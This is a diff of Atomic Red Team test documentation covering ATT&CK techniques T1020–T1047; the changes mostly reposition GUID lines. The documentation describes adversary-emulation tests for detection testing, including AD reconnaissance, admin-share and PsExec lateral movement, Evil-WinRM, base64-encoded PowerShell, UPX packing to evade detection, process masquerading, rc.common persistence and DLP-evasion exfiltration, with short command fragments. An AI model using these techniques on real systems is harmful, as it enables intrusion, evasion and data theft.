Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
#### Inputs:
@@ -351,14 +369,16 @@ pip3 install adidnsdump
<br/>
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
#### Inputs:
@@ -395,14 +415,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
#### Inputs:
atomics/T1020/T1020.md
+5 -3
View File
@@ -12,15 +12,17 @@ When automated exfiltration is used, other exfiltration techniques likely apply
<br/>
## Atomic Test #1 - IcedID Botnet HTTP PUT
auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file
**Supported Platforms:** Windows
**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
#### Inputs:
atomics/T1021.001/T1021.001.md
+10 -6
View File
@@ -16,13 +16,15 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
<br/>
## Atomic Test #1 - RDP to DomainController
auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
Attempt an RDP session via Remote Desktop Application to a DomainController.
**Supported Platforms:** Windows
**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
#### Inputs:
@@ -72,13 +74,15 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
## Atomic Test #2 - RDP to Server
auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b
Attempt an RDP session via Remote Desktop Application over Powershell
**Supported Platforms:** Windows
**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
#### Inputs:
atomics/T1021.002/T1021.002.md
+20 -12
View File
@@ -20,13 +20,15 @@ Windows systems have hidden network shares that are accessible only to administr
<br/>
## Atomic Test #1 - Map admin share
auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3
Connecting To Remote Shares
**Supported Platforms:** Windows
**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
#### Inputs:
@@ -54,13 +56,15 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
<br/>
## Atomic Test #2 - Map Admin Share PowerShell
auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5
Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
#### Inputs:
@@ -87,13 +91,15 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
<br/>
## Atomic Test #3 - Copy and Execute File with PsExec
auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
**Supported Platforms:** Windows
**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
#### Inputs:
@@ -135,14 +141,16 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
<br/>
## Atomic Test #4 - Execute command writing output to local Admin Share
auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46
Executes a command, writing the output to a local Admin Share.
This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
#### Inputs:
atomics/T1021.003/T1021.003.md
+5 -3
View File
@@ -16,9 +16,6 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
<br/>
## Atomic Test #1 - PowerShell Lateral Movement using MMC20
auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
Powershell lateral movement using the mmc20 application com object.
Reference:
@@ -26,9 +23,14 @@ Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
#### Inputs:
atomics/T1021.006/T1021.006.md
+15 -9
View File
@@ -16,15 +16,17 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
<br/>
## Atomic Test #1 - Enable Windows Remote Management
auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
@@ -44,15 +46,17 @@ Enable-PSRemoting -Force
<br/>
## Atomic Test #2 - Invoke-Command
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
Execute Invoke-command on remote host.
Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
**Supported Platforms:** Windows
**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
#### Inputs:
@@ -78,13 +82,15 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
<br/>
## Atomic Test #3 - WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
**Supported Platforms:** Windows
**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
#### Inputs:
atomics/T1027.001/T1027.001.md
+5 -3
View File
@@ -12,15 +12,17 @@ Binary padding effectively changes the checksum of the file and can also be used
<br/>
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
Uses dd to add a zero to the binary to change the hash.
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
#### Inputs:
atomics/T1027.002/T1027.002.md
+20 -12
View File
@@ -18,14 +18,16 @@ Utilities used to perform software packing are called packers. Example packers a
<br/>
## Atomic Test #1 - Binary simply packed by UPX (linux)
auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** Linux
**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
#### Inputs:
@@ -54,16 +56,18 @@ rm /tmp/packed_bin
<br/>
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux)
auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** Linux
**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
#### Inputs:
@@ -92,14 +96,16 @@ rm /tmp/packed_bin
<br/>
## Atomic Test #3 - Binary simply packed by UPX
auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** macOS
**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
#### Inputs:
@@ -128,16 +134,18 @@ rm /tmp/packed_bin
<br/>
## Atomic Test #4 - Binary packed by UPX, with modified headers
auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** macOS
**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
#### Inputs:
atomics/T1027.004/T1027.004.md
+10 -6
View File
@@ -14,14 +14,16 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
<br/>
## Atomic Test #1 - Compile After Delivery using csc.exe
auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206
Compile C# code using csc.exe binary used by .NET
Upon execution an exe named T1027.004.exe will be placed in the temp folder
**Supported Platforms:** Windows
**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
#### Inputs:
@@ -64,16 +66,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - Dynamic C# Compile
auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
**Supported Platforms:** Windows
**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
#### Inputs:
atomics/T1027/T1027.md
+30 -18
View File
@@ -26,15 +26,17 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
<br/>
## Atomic Test #1 - Decode base64 Data into Script
auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb
Creates a base64-encoded data file and decodes it into an executable shell script
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
@@ -57,15 +59,17 @@ chmod +x /tmp/art.sh
<br/>
## Atomic Test #2 - Execute base64-encoded PowerShell
auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
**Supported Platforms:** Windows
**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
#### Inputs:
@@ -94,15 +98,17 @@ powershell.exe -EncodedCommand $EncodedCommand
<br/>
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry
auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute encoded command and read/write from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
#### Inputs:
@@ -139,13 +145,15 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
<br/>
## Atomic Test #4 - Execution from Compressed File
auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
**Supported Platforms:** Windows
**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
#### Inputs:
@@ -190,14 +198,16 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
<br/>
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
**Supported Platforms:** Windows
**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
#### Inputs:
@@ -225,14 +235,16 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
<br/>
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
**Supported Platforms:** Windows
**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
#### Inputs:
atomics/T1030/T1030.md
+5 -3
View File
@@ -10,13 +10,15 @@
<br/>
## Atomic Test #1 - Data Transfer Size Limits
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
#### Inputs:
atomics/T1033/T1033.md
+15 -9
View File
@@ -16,16 +16,18 @@ Utilities and commands that acquire this information include <code>whoami</code>
<br/>
## Atomic Test #1 - System Owner/User Discovery
auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa
Identify System owner or users on an endpoint.
Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout.
Additionally, two files will be written to disk - computers.txt and usernames.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
#### Inputs:
@@ -57,15 +59,17 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
<br/>
## Atomic Test #2 - System Owner/User Discovery
auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c
Identify System owner or users on an endpoint
Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
@@ -87,13 +91,15 @@ who
<br/>
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)
auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca
Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
atomics/T1036.003/T1036.003.md
+45 -27
View File
@@ -26,15 +26,17 @@
<br/>
## Atomic Test #1 - Masquerading as Windows LSASS process
auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
**Supported Platforms:** Windows
**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
@@ -59,15 +61,17 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
<br/>
## Atomic Test #2 - Masquerading as Linux crond process.
auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
Upon successful execution, sh is renamed to `crond` and executed.
**Supported Platforms:** Linux
**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
@@ -92,15 +96,17 @@ rm /tmp/crond
<br/>
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe
auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -125,15 +131,17 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
<br/>
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
**Supported Platforms:** Windows
**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
@@ -158,15 +166,17 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
<br/>
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe
auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -191,15 +201,17 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
<br/>
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe
auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
#### Inputs:
@@ -244,13 +256,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #7 - Masquerading - windows exe running as different windows exe
auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe
**Supported Platforms:** Windows
**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
#### Inputs:
@@ -282,16 +296,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
<br/>
## Atomic Test #8 - Malicious process Masquerading as LSM.exe
auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
Detect LSM running from an incorrect directory and an incorrect service account
This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
@@ -317,15 +333,17 @@ del C:\lsm.exe >nul 2>&1
<br/>
## Atomic Test #9 - File Extension Masquerading
auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc
download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
**Supported Platforms:** Windows
**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
#### Inputs:
atomics/T1036.004/T1036.004.md
+10 -6
View File
@@ -14,13 +14,15 @@ Tasks or services contain other fields, such as a description, that adversaries
<br/>
## Atomic Test #1 - Creating W32Time similar named service using schtasks
auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
**Supported Platforms:** Windows
**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
@@ -45,13 +47,15 @@ schtasks /tn win32times /delete /f
<br/>
## Atomic Test #2 - Creating W32Time similar named service using sc
auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66
Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
**Supported Platforms:** Windows
**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
atomics/T1036.005/T1036.005.md
+5 -3
View File
@@ -12,13 +12,15 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
<br/>
## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
#### Inputs:
atomics/T1036.006/T1036.006.md
+5 -3
View File
@@ -14,13 +14,15 @@ Adversaries can use this feature to trick users into double clicking benign-look
<br/>
## Atomic Test #1 - Space After Filename
auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
Space After Filename
**Supported Platforms:** macOS
**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
#### Run it with these steps!
atomics/T1036/T1036.md
+5 -3
View File
@@ -12,13 +12,15 @@ Renaming abusable system utilities to evade security monitoring is also a form o
<br/>
## Atomic Test #1 - System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
atomics/T1037.001/T1037.001.md
+5 -3
View File
@@ -12,14 +12,16 @@ Adversaries may use these scripts to maintain persistence on a single system. De
<br/>
## Atomic Test #1 - Logon Scripts
auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
#### Inputs:
atomics/T1037.002/T1037.002.md
+5 -3
View File
@@ -12,13 +12,15 @@ Adversaries may use these login hooks to maintain persistence on a single system
<br/>
## Atomic Test #1 - Logon Scripts - Mac
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
Mac logon script
**Supported Platforms:** macOS
**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
#### Run it with these steps!
atomics/T1037.004/T1037.004.md
+15 -9
View File
@@ -20,15 +20,17 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
<br/>
## Atomic Test #1 - rc.common
auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de
Modify rc.common
[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
**Supported Platforms:** macOS
**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
@@ -48,13 +50,15 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
<br/>
## Atomic Test #2 - rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
Modify rc.common
**Supported Platforms:** Linux
**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
@@ -82,13 +86,15 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
<br/>
## Atomic Test #3 - rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
Modify rc.local
**Supported Platforms:** Linux
**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
atomics/T1037.005/T1037.005.md
+5 -3
View File
@@ -14,15 +14,17 @@ An adversary can create the appropriate folders/files in the StartupItems direct
<br/>
## Atomic Test #1 - Add file to Local Library StartupItems
auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198
Modify or create an file in /Library/StartupItems
[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
**Supported Platforms:** macOS
**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
atomics/T1040/T1040.md
+20 -12
View File
@@ -20,15 +20,17 @@ Network sniffing may also reveal configuration details, such as running services
<br/>
## Atomic Test #1 - Packet Capture Linux
auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
**Supported Platforms:** Linux
**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
#### Inputs:
@@ -66,15 +68,17 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
<br/>
## Atomic Test #2 - Packet Capture macOS
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
**Supported Platforms:** macOS
**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
#### Inputs:
@@ -112,16 +116,18 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
<br/>
## Atomic Test #3 - Packet Capture Windows Command Prompt
auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
installed.
Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
**Supported Platforms:** Windows
**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
#### Inputs:
@@ -173,14 +179,16 @@ Start-Process $env:temp\npcap_installer.exe
<br/>
## Atomic Test #4 - Windows Internal Packet Capture
auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528
Uses the built-in Windows packet capture
After execution you should find a file named trace.etl and trace.cab in the temp directory
**Supported Platforms:** Windows
**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
atomics/T1046/T1046.md
+20 -12
View File
@@ -18,15 +18,17 @@ Within cloud environments, adversaries may attempt to discover services running
<br/>
## Atomic Test #1 - Port Scan
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
Scan ports to check for listening ports.
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
@@ -49,15 +51,17 @@ done
<br/>
## Atomic Test #2 - Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
#### Inputs:
@@ -98,13 +102,15 @@ echo "Install nmap on the machine to run the test."; exit 1;
<br/>
## Atomic Test #3 - Port Scan NMap for Windows
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
Scan ports to check for listening ports for the local host 127.0.0.1
**Supported Platforms:** Windows
**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
#### Inputs:
@@ -143,13 +149,15 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
<br/>
## Atomic Test #4 - Port Scan using python
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
Scan ports to check for listening ports with python
**Supported Platforms:** Windows
**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
#### Inputs:
atomics/T1047/T1047.md
+40 -24
View File
@@ -26,14 +26,16 @@ An adversary can use WMI to interact with local and remote systems and use it as
<br/>
## Atomic Test #1 - WMI Reconnaissance Users
auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
An adversary might use WMI to list all local User Accounts.
When the test completes , there should be local user accounts information displayed on the command line.
**Supported Platforms:** Windows
**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
@@ -53,14 +55,16 @@ wmic useraccount get /ALL /format:csv
<br/>
## Atomic Test #2 - WMI Reconnaissance Processes
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
An adversary might use WMI to list Processes running on the compromised host.
When the test completes , there should be running processes listed on the command line.
**Supported Platforms:** Windows
**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -80,14 +84,16 @@ wmic process get caption,executablepath,commandline /format:csv
<br/>
## Atomic Test #3 - WMI Reconnaissance Software
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
An adversary might use WMI to list installed Software hotfix and patches.
When the test completes, there should be a list of installed patches and when they were installed.
**Supported Platforms:** Windows
**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -107,17 +113,19 @@ wmic qfe get description,installedOn /format:csv
<br/>
## Atomic Test #4 - WMI Reconnaissance List Remote Services
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreacheable
**Supported Platforms:** Windows
**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
#### Inputs:
@@ -143,14 +151,16 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
<br/>
## Atomic Test #5 - WMI Execute Local Process
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
This test uses wmic.exe to execute a process on the local host.
